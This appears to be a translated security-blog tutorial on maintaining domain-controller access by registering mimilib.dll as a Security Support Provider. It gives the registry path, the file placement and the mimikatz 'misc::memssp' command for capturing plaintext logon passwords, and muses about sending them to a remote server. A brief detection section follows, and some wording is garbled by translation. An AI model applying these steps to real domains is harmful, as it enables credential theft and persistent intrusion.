Domain penetration-Security Support Provider

Domain penetration-Security Support Provider

0x00 Preface

In the previous article, I introduced some penetration methods and techniques in the domain environment, so this time I will introduce a method used to maintain domain control permissions-SSP.

0x01 Introduction

SSP:

Security Support Provider, also known as Security Package.

SSP is a DLL used for identity authentication. For example:

#!bashNTLMKerberosNegotiateSecure Channel (Schannel)DigestCredential (CredSSP)

SSPI:

Security Support Provider Interface, which is an API used by Windows to perform authentication operations.

SSPI is an ssp api.

LSA:

Local Security authority, used for ID authentication. The authorization process is lsass.exe

The special feature is that lsacan be extended. When the system starts, sspwill be redirected to lsass.exe.

This means that we can define a dlland wait until the system is started into lsass.exe!

This is a normal SSPI structure diagram. The Client APP is our custom dll. With Secur32.dll, you can call "credential capture API" to obtain LSA information.

Demonstrate the attack ideas. Since we can customize the dll, We can customize the dll function and obtain the plaintext password in lsass.exe through Named Pipe and Shared memory, the new password can be obtained immediately when the password is changed!

0x02 mimilib SSP

Mimikatz already supports this function, and this file is the mimilib. dll that we often ignore when using it.

Next we will test how to use mimilib to forge the SSP record plaintext password.

Mimikatz poc address:
Https://github.com/gentilkiwi/mimikatz/blob/bb371c2acba397b4006a6cddc0f9ce2b5958017b/mimilib/kssp.c

0x03 actual test

Test Environment

#! Bash domain control: server 2008 r2 x64 domain host: win7 x64

Test procedure:

1. Add SSP

Copy mimilib. dll to domain control c: \ windows \ system32

Note:

64-bit system uses 64-bit mimilib. dll, 32-bit will fail

2. Set SSP

Modify the Registry location:

#!bashHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\Security Packages\

Add mimilib. dll under Security Packages

Click OK. Security Packages has been added with mimilib. dll.

3. restart the system

After the domain controller is restarted, the new file kiwissp. log is displayed in c: \ windows \ system32.

Kiwissp. log records the Logon account and password,

Tips:

Mimilib only saves the password to the local device. Isn't it so powerful if I send the password to a remote server?

0x04 supplement 1. Memory Updating of SSPs

Mimikatz also supports updating ssp through memory, so that you do not need to restart to obtain account information

Use mimikatz.exe. The command is as follows:

#!bashprivilege::debugmisc::memssp

Note:

1,64 system requires 64-bit mimikatz,

32-bit mimikatz Error

64-bit mimikatz success

2,The memory update method will expire after restart.

0x05 Detection 1. Registry

Check registry location:

#!bashHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\Security Packages\

2. dll

Check % windir % \ System32 for suspicious dll

3. Autoruns

Use Autoruns to detect LSA

To find the location where the dll is added.

0x06 Summary

This article only demonstrates the general usage of SSP to save the domain control account and password locally. Based on this idea, more advanced exploitation methods can be developed.

From the defense point of view, the conventional methods are insufficient. Only by understanding more about attacks can we better defend against them.